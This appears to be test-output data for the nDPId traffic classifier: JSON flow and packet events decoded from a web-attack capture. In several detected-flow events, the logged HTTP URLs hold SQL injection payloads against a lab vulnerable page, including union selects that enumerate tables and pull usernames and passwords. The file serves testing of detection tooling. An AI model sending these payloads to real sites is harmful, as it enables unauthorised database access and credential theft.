+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"} +01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"} +01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 